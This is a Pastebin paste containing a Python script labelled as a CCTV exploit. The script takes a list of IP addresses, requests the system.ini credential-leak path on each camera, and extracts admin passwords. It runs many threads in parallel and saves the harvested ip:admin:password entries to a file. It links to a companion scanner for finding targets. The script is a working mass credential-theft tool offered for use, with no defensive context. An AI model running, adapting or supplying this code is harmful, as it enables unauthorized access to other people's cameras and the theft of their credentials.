API tools faq
paste
Advertisement
ladyva

[Exploit] CCTV RCE Bruter

ladyva
May 29th, 2017
332
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.74 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # Bruteforce tool for CCTV RCE Exploit
  3. # You don't have to edit anything.
  4. # Scanner https://pastebin.com/dS0G0jba
  5.  
  6. import urllib.request, threading, socket, time, sys
  7. if len(sys.argv) != 2:
  8.     print("Correct useage: python " + sys.argv[0].split("\\").pop() + " <thread count> ")
  9.     sys.exit()
  10.    
  11. lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0
  12.  
  13. # Open output.txt
  14. list = open("output.txt", "r")
  15. scan = list.read()
  16. list.close()
  17.  
  18. scan = scan.split("\n")
  19. while "\n" in scan:
  20.     scan.remove("\n")
  21. pretotal = len(scan)
  22. def dumpcreds():
  23.     global finalprintout
  24.     global total
  25.     global scan
  26.     while len(scan) > 0:
  27.         try:
  28.             with lock:
  29.                 ip = scan.pop()
  30.             with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response:
  31.                 reply = str(response.read())
  32.                 if reply.find("admin") != -1:
  33.                     reply = reply[reply.find("admin"):]
  34.                     while reply.find("\\x00") != -1:
  35.                         reply = reply.replace("\\x00", "")
  36.                     password = reply[5:reply.find("\\")]
  37.                     if password.find("/") != -1:
  38.                         password = password[:password.find("/")]
  39.                     print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;35mFound\x1b[0;37m| admin:" + password + "@" + ip)
  40.                     with lock:
  41.                         finalprintout += ip + ":admin:" + password + "\n"
  42.                         total += 1
  43.         except:
  44.             pass
  45.  
  46. print(" \x1b[1;37m[\x1b[1;35m+\x1b[1;37m] \x1b[1;35mCCTV Camera Exploit \x1b[1;37m[\x1b[1;35m+\x1b[1;37m]\x1b[0m")
  47. print(" \x1b[1;37m[\x1b[1;31m*\x1b[1;37m] \x1b[1;36mCredits go to ★Cam★ \x1b[1;37m[\x1b[1;31m*\x1b[1;37m]")
  48. time.sleep(6)
  49. print("      \x1b[1;35mDumping Credentials, please wait")
  50. time.sleep(4)
  51.  
  52. for i in range(0, threadcount+1):
  53.     threads.append(threading.Thread(target=dumpcreds))
  54.  
  55. for thread in threads:
  56.     try:
  57.         thread.daemon = True
  58.         thread.start()
  59.     except:
  60.         pass
  61.  
  62. for thread in threads:
  63.     try:
  64.         thread.join()
  65.     except:
  66.         pass
  67.        
  68. while 1:
  69.     time.sleep(1)
  70.     done = False
  71.     for thread in threads:
  72.         if thread.isAlive() == True:
  73.             done = False
  74.             break
  75.         else:
  76.             done = True
  77.     if done == True:
  78.         writingit = open("vuln.txt", "w")
  79.         writingit.write(finalprintout)
  80.         writingit.close()
  81.         print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ")
  82.         break
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!